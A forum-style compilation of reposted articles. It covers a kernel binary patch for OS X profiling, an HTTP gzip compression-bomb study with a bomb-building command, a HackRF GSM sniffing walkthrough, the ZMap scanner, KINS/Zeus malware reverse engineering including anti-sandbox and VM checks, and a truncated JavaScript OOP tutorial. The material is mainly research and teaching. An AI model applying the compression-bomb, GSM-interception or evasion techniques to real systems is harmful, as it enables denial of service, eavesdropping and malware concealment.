but instead it is a call to code 224 bytes beyond the start of the threadsignal function. What’s going on is that psignal is a thin wrapper around psignal_internal, and that wrapper has been inlined. Since psignal_internal is a static function, it does not appear in the kernel symbol table, and so gdb doesn’t know its name. The definitions of psignal and psignal_uthread are: voidpsignal(proc_t p, int signum) { psignal_internal(p, NULL, NULL, 0, signum); } static void psignal_uthread(thread_t thread, int signum) { psignal_internal(PROC_NULL, TASK_NULL, thread, PSIG_THREAD, signum); } With the constants expanded, the call we’re seeing is psignal_internal(p, 0, 0, 0, 0x1b) and the call we want to turn it into is psignal_internal(0, 0, thread, 4, 0x1b). All we need to do is prepare the different argument list. Unfortunately, the thread variable was passed to bsd_ast in a register, and since it is no longer needed where we are in the function, the register has been reused for other purposes: thread is gone. Fortunately, bsd_ast’s one and only invocation in the kernel is bsd_ast(current_thread()), so we can reconstruct the value by calling current_thread ourselves. Unfortunately, there is no room in the 15 bytes from bsd_ast+349 to bsd_ast+364 to insert such a call and still prepare the other arguments. Fortunately, we can optimize a bit of the preceding code to make room. Notice that the calls to task_vtimer_set and task_vtimer_clear are passing the same argument list, and that argument list is prepared in both sides of the conditional: ... if (timerisset(&p->p_vtimer_prof.it_value)) 0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15) 0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319> 0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15) 0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335> task_vtimer_set(p->task, TASK_VTIMER_PROF); 0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi 0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi 0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set> 0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349> task_vtimer_clear(p->task, TASK_VTIMER_PROF); 0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi 0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi 0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear> psignal(p, SIGPROF); 0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi 0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi 0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx 0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx 0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d 0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224> ... We can pull that call setup above the conditional, eliminating one copy and giving ourselves nine bytes to use for delivering the signal. A call to current_thread would take five bytes, and then moving the result into an appropriate register would take two more, so nine is plenty. In fact, since we have nine bytes, we can inline the body of current_thread—a single nine-byte mov instruction—and change it to store the result to the correct register directly. That avoids needing to prepare a position-dependent call instruction. The final version is: ... 0xffffff8000568b7b <bsd_ast+299>: mov 0x18(%r15),%rdi 0xffffff8000568b7f <bsd_ast+303>: mov $0x2,%esi 0xffffff8000568b84 <bsd_ast+308>: cmpq $0x0,0x1e0(%r15) 0xffffff8000568b8c <bsd_ast+316>: jne 0xffffff8000568b98 <bsd_ast+328> 0xffffff8000568b8e <bsd_ast+318>: cmpl $0x0,0x1e8(%r15) 0xffffff8000568b96 <bsd_ast+326>: je 0xffffff8000568b9f <bsd_ast+335> 0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set> 0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568ba4 <bsd_ast+340> 0xffffff8000568b9f <bsd_ast+335>: callq 0xffffff8000237660 <task_vtimer_clear> 0xffffff8000568ba4 <bsd_ast+340>: xor %edi,%edi 0xffffff8000568ba6 <bsd_ast+342>: xor %esi,%esi 0xffffff8000568ba8 <bsd_ast+344>: mov %gs:0x8,%rdx 0xffffff8000568bb1 <bsd_ast+353>: mov $0x4,%ecx 0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d 0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224> ... If we hadn’t found the duplicate call setup to factor out, another possible approach would have been to factor the two very similar code blocks handling SIGVTALRM and SIGPROF into a single subroutine, sitting in the middle of the bsd_ast function code, and to call it twice. Removing the second copy of the code would leave plenty of space for the longer psignal_uthread call setup. The code we’ve been using is from OS X Mountain Lion, but all versions of OS X have this bug, and the relevant bits of bsd_ast haven’t changed from version to version, although the compiler and therefore the generated code do change. Even so, all have the basic pattern and all can be fixed with the same kind of rewrite. Using the Patch If you use the Go or the C++ gperftools and want accurate CPU profiles on OS X, I’ve packaged up the binary patcher as code.google.com/p/rsc/cmd/pprof_mac_fix. It can handle OS X Snow Leopard, Lion, and Mountain Lion. Will OS X Mavericks need a fix too? We’ll see. Further Reading Binary patching is an old, venerable technique. This is just a simple instance of it. If you liked reading about this, you may also like to read Jeff Arnold’s paper “Ksplice: Automatic Rebootless Kernel Updates.’’ Ksplice can construct binary patches for Linux security vulnerabilities and apply them on the fly to a running system. Sursa: research!rsc: Hacking the OS X Kernel for Fun and Profiles
-
Vulnerabilities that just won't die - Compression Bombs Recently Cyberis has reviewed a number of next-generation firewalls and content inspection devices - a subset of the test cases we formed related to compression bombs - specifically delivered over HTTP. The research prompted us to take another look at how modern browsers handle such content given that the vulnerability (or perhaps more accurately, ‘common weakness’ - CWE - CWE-409: Improper Handling of Highly Compressed Data (Data Amplification) (2.5)) has been reported and well known for over ten years. The results surprised us - in short, the majority of web browsers are still vulnerable to compression bombs leading to various denial-of-service conditions, including in some cases, full exhaustion of all available disk space with no user input. Introduction to HTTP Compression HTTP compression is a capability widely supported by web browsers and other HTTP User-Agents, allowing bandwidth and transmission speeds to be maximised between client and server. Supporting clients will advertise supported compression schemas, and if a mutually supported scheme can be negotiated, the server will respond with a compressed HTTP response. Compatible User-Agents will typically decompress encoded data on-the-fly. HTML content, images and other files transmitted are usually handled in memory (allowing pages to rendered as quickly as possible), whilst larger file downloads will usually be decompressed straight to disk to prevent unnecessary consumption of memory resources on the client. Gzip (RFC1952) is considered the most widely supported compression schema in use today, although the common weaknesses discussed in this post are applicable to all schemas in use today. What is a Compression Bomb? Quite simply, a compression bomb is compressed content that extracts to a size much larger than the developer expected; in other words, incorrect handling of highly compressed data. This can result in various denial-of-service conditions, for example memory, CPU and free disk space exhaustion. Using an entropy rate of zero (for example, /dev/zero), coupled with multiple rounds of encoding that modern browsers support (see our ResponseCoder post), a 43 Kilobyte HTTP server response will equate to a 1 Terabyte file when decompressed by a receiving client - an effective compression ratio of 25,127,100:1. It is trivial to make a gzip bomb on the Linux command line - see below for an example of a 10MB file being compressed to just 159 bytes using two rounds of gzip compression: $ dd if=/dev/zero bs=10M count=1 | gzip -9 | gzip -9 | wc -c 1+0 records in 1+0 records out 10485760 bytes (10 MB) copied, 0.149518 s, 70.1 MB/s 159 Testing Framework Cyberis has released a testing framework, both for generic HTTP response tampering and various sizes of gzip bombs. GzipBloat (https://www.github.com/cyberisltd/GzipBloat) is a PHP script to deliver pre-compressed gzipped content to a browser, specifying the correct HTTP response headers for the number of encoding rounds used, and optionally a ‘Content-Disposition’ header. A more generic response tampering framework - ResponseCoder (https://www.github.com/cyberisltd/ResponseCoder) - allows more fine grained control, although content is currently compressed on the fly - limiting its effectiveness when used to deliver HTTP compression bombs. Both tools are designed to assist you in testing both intermediary devices (content inspection/next-generation firewalls etc.) and browsers for compression bomb vulnerabilities. During our tests, we delivered compressed content in a variety of different forms, both as ‘file downloads’ and in-line ‘HTML content’. The exact tests we conducted and the results can be read in our more detailed paper on this topic here. Is my Browser Vulnerable? It is actually easier to name the browser that is not vulnerable - namely Opera - all other major desktop browsers (Internet Explorer, Firefox, Chrome, Safari) available today exhibited at least one denial-of-service condition during our test. The most serious condition observed was an effective denial-of-service against Windows operating systems when a large gzip encoded file is returned with a ‘Content-Disposition’ header - no user interaction was required to exploit the vulnerability, and recovery from the condition required knowledge of the Temporary Internet Files directory structure and command line access. This seemed to affect all recent versions of IE, including IE11 on Windows 8.1 Preview. Our results demonstrated that the most popular web browsers in use today are vulnerable to various denial-of-service conditions - namely memory, CPU and free disk space consumption - by failing to consider the high compression ratios possible from data with an entropy rate of zero. Depending on the HTTP response headers used, vulnerable browsers will either decompress the content in memory, or directly to disk - only terminating when operating system resources are exhausted. Conclusion With the growth of mobile data connectivity, improvements in data compression for Internet communications has become highly desirable from a performance perspective, but extensions to these techniques outside of original protocol specifications can have unconsidered impacts for security. Although compression bombs have been a known threat for a number of years, the growing ubiquity of advanced content inspection devices, and the proliferation User-Agents which handle compression mechanisms differently, has substantially changed the landscape for these types of attack. The attacks discussed here will provide an effective denial-of-service against a number of popular client browsers, but the impact in these cases is rather limited. Ultimately, the greater impact of this style of attack is likely to be felt by intermediate content inspection devices with a large pool of users. It is possible a number of advanced content inspection devices may be susceptible to these decompression denial-of-service attacks themselves, potentially as the result of a single server-client response. In an environment with high availability requirements and a large pool of users, a denial-of-service attack which could be launched by a single malicious Internet server could have a devastating impact. Posted by Cyberis at 07:36 Sursa: Cyberis Blog: Vulnerabilities that just won't die - Compression Bombs
-
[h=3]Sniffing GSM with HackRF[/h]by admin » Wed Aug 14, 2013 1:29 am I will open by saying only sniff your own system or a system you have been given permission to work on, Sniffing a public network in your country may be illegal. I recently had a play with sniffing some gsm using the HackRF, The clock was a little unstable and drifted quite a bit but in the end I was able to view lots of different system messages etc. I will assume you have a working linux system with gnuradio and hackrf running for this turotial, If not you can use the live cd which I referenced in the software section of the forum its a great tool and the hackrf works right out of the box. First thing to do is find out the freq of a local gsm tower for this I used gqrx which is pre loaded on the live cd, open it up and have a look around the 900mhz band and you should see something like the image below. gqerx.png (274.82 KiB) Viewed 6938 times You can see the non hopping channel at 952Mhz and another at 944.2Mhz write down the approximate frequency for the later step. Now we need to install Airprobe using the following commands. git clone git://git.gnumonks.org/airprobe.git cd airprobe/gsmdecode ./bootstrap ./configure make cd airprobe/gsm-receiver ./bootstrap ./configure make Thats all there is too it we can now start recieving some gsm first things first start wireshark with the following command: sudo wireshark Select "lo" as the capture device and enter gsmtap in the filter window like in the image below: wireshark.png (66.89 KiB) Viewed 6938 times Now go back to your terminal window and enter the following: cd airprobe/gsm-receiver/src/python ./gsm_receive_rtl.py -s 2e6 A window will pop up and the first thing is to do is uncheck auto gain and set the slider to full, then enter the gsm frequency you noted before as the center frequency. Also select peak hold and average in the top windows trace options like so: spectrum.png (109.9 KiB) Viewed 6938 times You will see that only signal on the right (blue line) consitently stays in place over the peak hold (green line) indicating that it is the non hopping channel, All we need to do to start decoding is in the top window click on the center of that frequency hump. You may see some error coming up but that is ok eventually it will start to capture data something like this: data.png (225.52 KiB) Viewed 6938 times You can now see the gsm data popping up in wireshark, as I said at the beginning the hackrf clock does drift so you will need to keep clicking to re-center the correct frequency but all in all it works pretty good. As silly as it may sound wraping your hack rf in a towel or similar really helps the thermal stability of the clock and reduces drift. Now this "hack" is obviously not very usefull on its own but I think atleast it helps to show the massive amounts of potential there is in the HackRF. Sursa: BinaryRF.com • View topic - Sniffing GSM with HackRF
-
Scanning the Internet in 45 Minutes by Dennis Fisher The Internet is a big thing. Or, more accurately, a big collection of things. Figuring out exactly how many things, and what vulnerabilities those things contain has always been a challenge for researchers, but a new tool released by a group from the University of Michigan that is capable of scanning the entire IPv4 address space in less than an hour. There have been a handful of Internet-wide scans done by various organizations over the years, but most of them have not had a security motivation. And they can take days or weeks, depending upon how the scan is done and what the researchers were trying to accomplish. But the new Zmap tool built by the Michigan researchers has the ability to perform an Internet-wide scan in about 45 minutes while running on an ordinary server. The tool, which the team presented at the USENIX Security conference last week, is open-source and freely available for other researchers to use. To demonstrate the capabilities of Zmap, the Michigan team, which comprises J. Alex Halderman, an assistant professor, and Eric Wustrow and Zakir Durumeric, both doctoral candidates, ran a scan of the entire IPv4 address space, returning results from more 34 million hosts, or what they estimate to be about 98 percent of the machines in that space. Zmap is designed specifically to bypass some of the speed obstacles that have slowed down some of the previous large-scale scans of the Internet. The researchers removed some of the considerations for machines on the other end of the scan, for example assuming that they sit on well-provisioned networks and can handle fast probes. The result is that the tool can scan more than 1,300 times faster than the venerable Nmap scanner. “While Nmap adapts its transmission rate to avoid saturating the source or target networks, we assume that the source network is well provisioned (unable to be saturated by the source host), and that the targets are randomly ordered and widely dispersed (so no distant network or path is likely to be saturated by the scan). Consequently, we attempt to send probes as quickly as the source’s NIC can support, skipping the TCP/IP stack and generating Ethernet frames directly. We show that ZMap can send probes at gigabit line speed from commodity hardware and entirely in user space,” the researchers say in their paper, “Zmap: Fast Internet-Wide Scanning and Its Security Implications”. “While Nmap maintains state for each connection to track which hosts have been scanned and to handle timeouts and retransmissions, ZMap forgoes any per-connection state. Since it is intended to target random samples of the address space, ZMap can avoid storing the addresses it has already scanned or needs to scan and instead selects addresses according to a random permutation generated by a cyclic multiplicative group.” That stateless scanning, the researchers said, allowed Zmap to get both faster response times and better coverage of the target address space. As for practical applications of the tool, the researchers already have found several. In the last year, the team ran 110 separate scans of the entire HTTPS infrastructure, finding a total of 42 million certificates. Interestingly, they only found 6.9 million certificates that were trusted by browsers. They also found two separate sets of mis-issued SSL certificates, something that’s been a serious problem in recent years. The Zmap team also wrote a custom probe to look for the UPnP vulnerability that HD Moore of Rapid 7 discovered in January. After scanning 15.7 million devices, they found that 3.3 million were still vulnerable. That bug can be exploited with a single packet. “Given that these vulnerable devices can be infected with a single UDP packet [25], we note that these 3.4 million devices could have been infected in approximately the same length of time—much faster than network operators can reasonably respond or for patches to be applied to vulnerable hosts. Leveraging methodology similar to ZMap, it would only have taken a matter of hours from the time of disclosure to infect every publicly available vulnerable host,” the researchers say in the paper. Sursa: Scanning the Internet in 45 Minutes | Threatpost
-
[h=1]Java tops C as most popular language in developer index[/h] [h=2]As Tiobe factors in more sites in its assessment, Java rises, while C and Objective-C drop in the rankings[/h] By Paul Krill | InfoWorld Java has retaken the lead in this month's Tiobe index of the most popular programming languages, which now assesses more search engines to calculate the numbers. The C language barely slipped to the second spot in the August rendition of the Tiobe Programming Community index. Java last held the lead in March. "C and Objective-C are the biggest victims of adding the 16 new search engines," with Objective-C dropping from third place last month to fourth place, Tiobe said. Winners are the Google Go language, which rose to the 26th ranking after being ranked 42nd; LabView, rising from 100 to 49; and Openedge ABL, moving from 129th to 57th. Tiobe gauges language popularity by assessing searches about languages made on popular sites like Google, Yahoo, Baidu, and Wikipedia. Specifically, Tiobe counts skilled engineers, courses, and third-party vendors pertinent to a language. Most of the new indexes are from the United States and China, with Japanese and Brazilian sites also added to the mix. Reddit and MyWeb are among the new sites being gauged. Still, the new sites count for only a small portion when calculating the ratings. "Yes, we added more search engines to improve the validity of the index," Tiobe Managing Director Paul Jansen said. "Another related reason is to make sure that there are less fluctuations in rankings." Tiobe's rankings have had their critics, including Andi Gutmans, CEO of PHP tools vendor Zend Technologies. And consistency among these indexes is now in question. Last month, Tiobe and the rival Pypl Popularity of Programming Language index both had decidedly different takes on the PHP language, with Tiobe saying it was making a comeback while Pypl said it was declining. For the month of August, Java turned up in 15.978 percent of Tiobe's searches, barely ahead of C, at 15.974 percent. Rounding out the top five were C++ (9.371 percent), Objective-C (8.082 percent), and PHP (6.694 percent). Pypl, which assesses just the volume of language tutorials searched in Google, also had Java tops (a 27.2 percent share of the index). It was followed by PHP (14.3 percent), C# (9.8 percent), Python (also 9.8 percent), and C++ (9.1 percent). This story, "Java tops C as most popular language in developer index," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter. Sursa: Java tops C as most popular language in developer index | Java programming - InfoWorld
-
KINS malware: initialization and DNA paternity test A new post about KINS, I don’t have anything interesting on my hands right now so I decided to go on with the analysis of it. This was my first idea, but someone (Thanks Michael) suggested to me something to add to the analysis. The idea comes from a simple question: is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’ll start looking at KINS with an eye to Zeus trying to understand if there are some similarities or not. Holidays are coming and I don’t have a lot of free time for a complete analysis of the entire malware, right now you have to be satisfied with just the ground of KINS and Zeus_leaked_source_code, the initialization part only. It’s generally an annoying job but from the ground you can understand a lot of information of the malware. Anyway, I’ll try to write something light and readable. Reference KINS malware: md5 = 7b5ac02e80029ac05f04fa5881a911b2 Reference Zeus leaked source code: version 2.0.8.9 Encrypted strings Strings are always a good starting point and like almost all the malwares out there every suspicious string has been crypted, most of the time a simple xor encryption would suffice. KINS doesn’t decrypt all the strings in a unique time, it decrypts a single string when it has to use it. Inside the .text section there’s an array of _STRINGINFO structures, each structure contains the necessary data about a single encrypted string: 00000000 _STRINGINFO struc ; (sizeof=0x8) 00000000 key db ? ; xor key used to decrypt the encoded string 00000001 db ? ; undefined ; unused because xor key is 1 byte only 00000002 size dw ? ; size of the string to decrypt 00000004 encodedString dd ? ; string to decrypt 00000008 _STRINGINFO ends When the malware needs a string it calls DecryptStringW passing an index to it, the index is the array index: 4231CA DecryptStringW proc near 4231CA movzx eax, ax ; Id of the string to decrypt 4231CD lea eax, STRINGINFO[eax*8] ; current _STRINGINFO identified by the index 4231D4 xor ecx, ecx 4231D6 xor edx, edx ; iterator index 4231D8 cmp cx, [eax+_STRINGINFO.size] 4231DC jnb short loc_423209 4231DE push ebx 4231DF push edi 4231E0 DecryptStringIterator: 4231E0 mov edi, [eax+_STRINGINFO.encodedString] 4231E3 movzx ebx, [eax+_STRINGINFO.key] 4231E6 movzx ecx, dx 4231E9 movsx di, byte ptr [edi+ecx] 4231EE xor di, bx ; xor with key 4231F1 xor di, dx ; xor with iterator index 4231F4 mov ebx, 0FFh 4231F9 and di, bx ; the result is a unicode string 4231FC inc edx ; increase iterator index 4231FD mov [esi+ecx*2], di ; decrypt byte by byte 423201 cmp dx, [eax+2] 423205 jb short DecryptStringIterator 423207 pop edi 423208 pop ebx 423209 loc_423209: 423209 movzx eax, [eax+_STRINGINFO.size] 42320D xor ecx, ecx 42320F mov [esi+eax*2], cx ; put NULL at the end of the string 423213 retn 423213 DecryptStringW endp A double xor operation over every byte of the encrypted string. KINS uses the same structure (_STRINGINFO) and the same decryption method (DecryptStringW) used by Zeus_leaked_source_code. It’s a perfect copy&paste approach. There are a lot of strings declared inside the exe, a comparison of the decrypted string is necessary. To decrypt all the string inside KINS you can use this simple idc function script: static ListStrings(address){ auto iString; auto sInfo; auto xorKey; auto sLen; auto crypted; auto i; Message("\nDecrypted string list:\n"); iString = 0; while((address + iString) < 0x4026C8) { sInfo = address + iString; xorKey = Byte(sInfo); if (xorKey != 0) { sLen = Word(sInfo+2); crypted = Dword(sInfo+4); if (!((crypted MaxEA()))) { Message("\""); for(i=0;i<sLen;i++) Message("%c", Byte(crypted+i) ^ xorKey ^ i); Message("\"\n"); iString = iString + 7; // sizeof(_STRINGINFO) - 1 } } iString++; } } The result list contains a lot of interesting strings but comparing this list with the original one provided by Zeus you can note a lot of equal strings. I have to admit that there are some new entries but the core remains the same. Init KINS initialization resides inside a snippet of code starting @407A25 and ending @407C73. It performs all the necessary tasks needed for a clear execution of itself. Looking inside the code you’ll notice that Init procedure is referenced by two different places, one at the beginning of the malware and the other one during its execution. Besides, Init has a lot of calls inside but not all are executed at the first time. That’s because KINS has 2 level of initialization, it has to sets some things now and some later. The first level of execution is performed at the very beginning of the code and the second level is executed when particular operation has to be done. I’ll tell you something more about this 2° level in the next blog post. I.e.: the process injection feature requires the execution of parts of the Init procedure that are not scheduled in the first execution of Init. I think KINS doesn’t want to spoil a lot in his first part of the code, and prefer to follow an exact time scheme. I said KINS but I should say Zeus because this particular code structure is the same used by Zeus. Moreover, there’s another piece of code taken by a copy&paste: to decide what to setup the first time and what later Init checks the dword value passed as a parameter, I call it “flags”. flags is checked inside some if statements, here is a practical example: .text:00407A31 mov eax, [ebp+flags] // INITF_NORMAL_START the first time, (INITF_INJECT_START | INITF_HOOKS_FOR_USER) the next one ... .text:00407A36 mov esi, eax .text:00407A38 and esi, 1 // Check for INITF_INJECT_START flag bit .text:00407A3B mov [esp+420h+flags_Core], esi .text:00407A3F jnz short loc_407A4B .text:00407A41 xor ebx, ebx // First time .text:00407A43 mov processFlags, ebx .text:00407A49 jmp short loc_407A4D .text:00407A4B xor ebx, ebx // Second time .text:00407A4D call InitLoadModules flags represents the value passed to Init, the first time flags’s value is 0 (INIT_NORMAL_START) and the second time is 3 (INITF_INJECT_START | INITF_HOOKS_FOR_USER). I have started the analysis right now but copy&paste method has been used a lot of times. For a better explanation I announce you that KINS is heavily based on Zeus_leaked_source_code. Some parts are really equals, some parts have minor changes only, some of them have interesting additions and some of them are from Zeus version above 2.0.8.9. Yes, KINS writers took something from more than one Zeus version. Copy&paste As far as I’ve seen the core of the malware is equal to Zeus’s core. It’s based on the same structures, variables and code design. Here is a list of things that are directly taken from Zeus. - Global variables Global variables is one of the first things I tried to understand, and I have to say that most of them are simple flags used to recognize a particular status or event. You can recognize them from the code looking at mov instructions: 407C34 mov ref_count, ebx 407C3A mov reportFile, ax 407C40 mov registryKey, ax 407C46 mov readWriteMutex_localconfig, ax 407C4C mov registryKey_localconfig, ax 407C52 mov readWriteMutex_localsetting, ax 407C58 mov registryKey_localsetting, ax - Memory initialization The malware will need dynamic allocated memory, you can find the initialization memory code starting from @407A5D. This time you can see a mix of flag/variable init: 407A5D push ebx 407A5E push 80000h 407A63 push ebx 407A64 call ds:HeapCreate 407A6A mov mainHeap, eax 407A6F cmp eax, ebx 407A71 jnz short HeapCreate_OK 407A73 call ds:GetProcessHeap 407A79 mov hHeap, eax 407A7E mov heapCreated, bl ; heapCreated = false; 407A84 jmp short loc_407A8D 407A86 HeapCreate_OK: 407A86 mov heapCreated, 1 ; heapCreated = true; mainHeap is a global variable and heapCreated is just a flag used to set the success or not of the heap creation process. - Crypt initialization Crypto is used by KINS and like all the other functionalities it requires a small place inside Init. 407A9A mov _last_rand_tickcount, ebx ; _last_rand_tickcount = 0; 407AA0 mov crc32Intialized, bl ; crc32Intalized = false; From the only two lines of code used to perform this init operation it’s hard to predict the meaning of them but, again, flag and var are used. If you want to understand some more things about them you can try with xref IDA option. After some more investigations you can understand their real use: _last_rand_tickcount is used in comparison between a value obtained by GetTickCount and the previous tick count value. crc32Initialized is true if crc32 has been initialized, false otherwise. - Winsock initialization Another expected feature of the malicious program is the ability to communicate with the server. A malware should send something to the server, and to start this communication process it needs a call to a function like WSAStartup. The winsock part is all inside a single call instruction to WSAStartup. KINS and Zeus initiate a client-server communication in the same classical way. - initHandles, initUserData, initPaths The name of the 3 procedures used above are taken from Zeus_leaked_source_code, and I put them together because they initialize global variables only. The procedures are not so interesting per se.. To sum-up I can say that KINS creates a manual reset event, it gets the security information of a logon access (it saves two values: the length of the logon security identifier (SID) and an Id which is calculated by crc32(SID)), and it gets the full path for KINS executable. - initOsBasic The last fully copy&paste code contains Os based tasks. It starts determining whether KINS is running under WOW64 or not. The status is saved inside a boolean flag and after that it tries to add a new full access security descriptor. Once again it saves the result of the operation, it’s not a flag variable but a structure with information about the security descriptor. An empty structure means an error during the task. If everything goes fine, KINS produces a 16 bytes long identifiers based on the volume GUID path: 41D9C0 push 64h ; cchBufferLength 41D9C2 lea eax, [ebp+74h+szVolumeName] 41D9C5 push eax ; lpszVolumeName 41D9C6 lea eax, [ebp+74h+szVolumeMountPoint] 41D9CC push eax ; lpszVolumeMountPoint 41D9CD call edi ; GetVolumeNameForVolumeMountPointW 41D9CF test eax, eax ; check the result 41D9D1 jz short GetVolumeNameForVolumeMountPointW_FAILS 41D9D3 cmp [ebp+74h+sz], '{' ; a minor check over the obtained string 41D9D8 jnz short ERROR 41D9DA push [ebp+74h+pclsid] ; pclsid 41D9DD xor eax, eax 41D9DF mov [ebp+74h+var_68], ax ; str[38] = 0; 41D9E3 lea eax, [ebp+74h+sz] 41D9E6 push eax ; lpsz 41D9E7 call ds:CLSIDFromString ; ottiene: GetVolumeNameForVolumeMountPoint could fail, just in case the snippet above can be executed more than one time. The first lpszVolumeMountPoint value is obtained calling SHGetFolderPath. In case GetVolemeNameForVolumeMountPoint fails the new lpszVolumeMountPoint string is obtained cutting the last part of it (it uses PathRemoveFileSpec). I.e.: it tries “C:\WINDOWS\” and then with “C:\” only. From the organization of the code and the large variety of flags/variables used seems like there’s a big focus to the details. If something goes wrong, or if KINS thinks that it doesn’t have the right condition to run it stops running. I.e.: KINS uses a variable to store a value obtained from the combination of the Os version and the integrity level. If the value is out from a range of specific acceptable values the malware stops. That’s why Zeus was, from some points of views, a master-piece. Yes, I said Zeus and you know why. Copy&paste with minor changes It happens when the code structure of a procedure is the same of the original version but there are some changes or additions. It’s the case of the InitLoadModules function, basically it’s a sequence of DecryptString/GetProcAddress calls. The list of functions address to retrieve is slightly changed from Zeus. The new list is composed by: NtCreateThread, NtCreateUserProcess, NtQueryInformationProcess, NtQueryInformationThread, RtlUserThreadStart, NtMapViewOfSection, NtUnmapViewOfSection, NtSuspendProcess, NtResumeProcess, NtClose and LdrFindEntryForAddress. I don’t know if it’s a KINS addition or it’s taken from a Zeus new version. I’m not a security expert and I can’t access all the possible Zeus versions but it’s a doubt I have: KINS takes some concept from other Zeus versions (over the one I’m referring to, 2.0.8.9). Copy&paste from more recent Zeus version Here’s a practical example of my doubt, the anti check routine! As I said before KINS runs under particular conditions, and his continuation depends on the values returned by the 8 calls called here. Every call performs a specific check: - CheckForPopupKiller: look for “C:\popupkiller.exe” file, if it exists KINS aborts - CheckForExecuteExe: another unwanted file on the system is “C:\TOOLS\execute.exe” - CheckForSbieDll: it’s time for a dll check, it tries to load “SbieDll.dll” (Sandboxie related dll), it won’t that dll on the system - CheckMutexFrz_State: the mutex under the observation is Frz_State which is from Deep Freeze software - CheckForNPF_NdisWanIp: the network related tool check, KINS doesn’t want “\\.\NPF_NdisWanIp” on the system - CheckForVMWareRelatedFiles: VmWare is strictly prohibited: “\\.\HGFS” and “\\.\vmci” are the file to look for - CheckForVBoxGuest: even VirtualBox is prohibited (“\\.\VBoxGuest”) - CheckForSoftwareWINERegKey: check the existence of the key “Software\WINE” If one of the calls above fails KINS aborts his execution immediately. There’s no trace of this code inside Zeus_leaked_source_code but I read some articles on the net talking about this specific snippet. You can read something here Snippets based on Zeus with KINS specific features That’s the most interesting part of the malware Init, the place where something new join the party! In this part of the code the malware tries to create some Id values, they are based on the machine components and properties (computer name, version information, install date, GUID, physical memory and volume serial number). Zeus does the same but it uses a simple xor decryption, crc32 and Rc4 in his calculations. KINS substitutes everything with the use of his personal virtual machine combined to crc32, Rc4, Sha1 hash algorithm and some brain blasting calculation. I won’t go in details right here but if you need it drop me a mail and I’ll tell you more. Basically, the addition are strictly related to the use of the virtual machine only. I gave a description of the virtual machine here, but I didn’t talk about his usage inside the malware. The VM is called some times during the life time of the malware but every time the VM modifies DataBuffer in the same way (it means the algo produced by the VM is always the same). When the VM ends, a number of bytes from DataBuffer are taken for the specific usage; in this initialization process they are used as a key for Rc4 algo. Imho, it’s quite strange approach. I don’t know why you have to call the same algo a lot of times, especially when the result is always the same. Maybe it’s just a way to confuse the job of the reversers out there or maybe I’m missing something… Is KINS a new myth or is it just born from the leaked Zeus source code? Well, I’m not a security expert and I can’t say it for sure but judging from what I’ve seen so far I think that KINS is strongly based on Zeus_leaked_source_code, they have the same DNA! It’s the same concept of the real life, KINS has something completely new, but the core comes from the father, Zeus. Anyway, this is only an introduction to the DNA paternity test. Now I would like to know if we can apply the same concept to all the features of both malwares. Maybe soon, now it’s holiday time! Sursa: KINS malware: initialization and DNA paternity test | My infected computer
-
JavaScript Object Oriented Programming(OOP) Tutorial Object Oriented Programming is one of the most famous way to do programming. Before OOPs there was only list of instructions execute one bye one. But in OOPs we will deal with Objects and how those objects t interact with one another. JavaScript supports Object Oriented Programming but not the same way as other OOP languages(c++,php,Java,etc.). The main difference between these language and JavaScript is, there is no Classes in JavaScript where the classes are very impotent to create objects. But there is a way we can simulate the Class concept in JavaScript. Another important difference is data hiding. There is no access specifiers like (public,private,protected) in JavaScript. Again we will simulate the concept using variable scope in functions. Object Oriented Programming Concepts 1)Object 2)Class 3)Constructor 4)Inheritance 5)Encapsulation 6)Abstraction 7)Polymorphism Preparing the work space Create a new file "oops.html" and write this code on it. We will write all our JavaScript code on this file. <html> <head> <title>JavaScript Object Oriented Programming(OOPs) Tutorial</title> </head> <body> <script type="text/javascript"> //Write your code here..... </script> </body> </html> 1)Object Any real time entity is consider as Object. Every Object will have some properties and functions. For example consider person as an object then he will have properties like name,age,etc. And functions as walk, talk, eat, think,etc. Now lets see how we create objects in JavaScript. There are so many ways we can create objects in JavaScript. Some of them are //1)Creating Object through literal var obj={}; //2)Creating with Object.create var obj= Object.create(null); //3)Creating using new keyword function Person(){} var obj=new Person(); We can use any of the above way to create Object. 2)Class As I said earlier there on classes in JavaScript. Because JavaScript is Prototype based language. But we can simulate the class concept using JavaScript functions. function Person(){ //Properties this.name="aravind"; this.age="23"; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person(); alert(p.sayHi()); 3)Constructor Actually Constructor is a concepts comes under Class concept. The constructor is used to assign values to the properties of the Class when creating object using new operator. In above code we have use name,age properties for Person class now will assign values while creating new objects for person class as below. function Person(name,age){ //Assigning values through constructor this.name=name; this.age=age; //functions this.sayHi=function(){ return this.name +" Says Hi"; } } //Creating person instance var p=new Person("aravind",23); alert(p.sayHi()); //Creating Second person instance var p=new Person("jon",23); alert(p.sayHi()); 4)Inheritance Inheritance is a concept of getting the properties and function of one class to other class is classed Inheritance. For example lets consider "Student" Class. Now the Student also have properties name,age. We already have this properties in Person 